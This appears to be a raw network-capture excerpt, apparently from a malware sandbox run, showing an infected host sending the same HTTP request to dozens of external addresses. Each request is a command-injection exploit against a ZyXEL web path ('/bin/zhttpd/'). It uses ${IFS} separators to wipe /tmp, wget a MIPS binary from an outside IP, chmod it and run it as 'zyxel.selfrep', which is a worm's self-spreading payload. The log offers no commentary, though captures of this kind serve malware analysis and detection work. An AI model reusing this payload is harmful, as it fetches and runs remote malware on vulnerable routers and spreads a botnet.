                                            Jan 14, 2024 15:50:38.392116070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3891192.168.2.233850277.57.79.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.392172098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3892192.168.2.2338132140.105.161.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.392224073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3893192.168.2.2347462102.9.231.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.392225027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3894192.168.2.23468884.51.51.127443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.392273903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3895192.168.2.2360312109.87.157.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.392329931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3896192.168.2.2343614183.79.81.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.392349005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3897192.168.2.2357352139.217.33.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.392365932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3898192.168.2.2336392181.223.55.250443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.392451048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3899192.168.2.2356752205.9.8.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.392472029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3900192.168.2.2358606164.214.207.201443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.392496109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3901192.168.2.2343364136.32.108.139443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.392523050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3902192.168.2.235144868.224.249.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.392539978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3903192.168.2.235872849.2.35.41443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.392563105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3904192.168.2.2334202153.213.157.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.392607927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3905192.168.2.234030694.108.113.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.392635107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3906192.168.2.2334040157.111.98.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.392728090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3907192.168.2.233687295.223.160.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.392743111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3908192.168.2.2342852113.117.24.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.392791986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3909192.168.2.2354002155.254.27.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.392793894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3910192.168.2.235188290.238.27.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.392829895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3911192.168.2.2341986113.216.80.212443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.392842054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3912192.168.2.235242081.21.35.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.392868996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3913192.168.2.2353852115.176.199.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.392930984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3914192.168.2.234711088.156.5.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.392960072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3915192.168.2.2347162111.141.153.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393013954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3916192.168.2.23423149.7.248.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393039942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3917192.168.2.235956272.57.16.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393074036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3918192.168.2.235399873.131.91.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393098116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3919192.168.2.2358962122.152.144.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393140078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3920192.168.2.234402214.105.147.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393147945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3921192.168.2.2334306139.68.186.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393170118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3922192.168.2.235591285.46.53.234443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393183947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3923192.168.2.234533813.233.252.167443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393241882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3924192.168.2.233327693.238.72.124443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393260956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3925192.168.2.234216445.125.188.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393301964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3926192.168.2.23523944.69.247.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393335104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3927192.168.2.2338774148.127.178.38443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393376112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3928192.168.2.23335764.87.139.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393376112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3929192.168.2.2340552202.19.14.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393414021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3930192.168.2.234539882.242.93.6443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393431902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3931192.168.2.234847064.229.114.92443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393460035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3932192.168.2.2338094202.210.154.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393503904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3933192.168.2.2341704159.185.208.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393505096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3934192.168.2.234462224.99.42.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393532991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3935192.168.2.2345412177.83.109.225443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393546104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3936192.168.2.2349378154.87.88.157443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393620014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3937192.168.2.2345956187.202.130.32443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393630981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3938192.168.2.235051659.80.83.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393651009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3939192.168.2.2337094106.219.253.10443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393692017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3940192.168.2.2346244143.46.8.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393708944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3941192.168.2.234085663.160.76.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393718958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3942192.168.2.234069835.133.65.124443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393747091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3943192.168.2.235477699.162.113.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393795967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3944192.168.2.2334882155.89.139.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393795967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3945192.168.2.2343632181.2.43.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393815994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3946192.168.2.234504287.5.245.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393817902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3947192.168.2.234738077.56.253.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393845081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3948192.168.2.234196458.187.92.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393857002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3949192.168.2.2355192223.87.26.164443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393860102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3950192.168.2.2353528133.195.207.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393871069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3951192.168.2.233321624.230.159.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393934965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3952192.168.2.233491654.67.215.120443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.393934965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3953192.168.2.2358696145.20.131.22443
                                            TimestampBytes transferredDirectionData
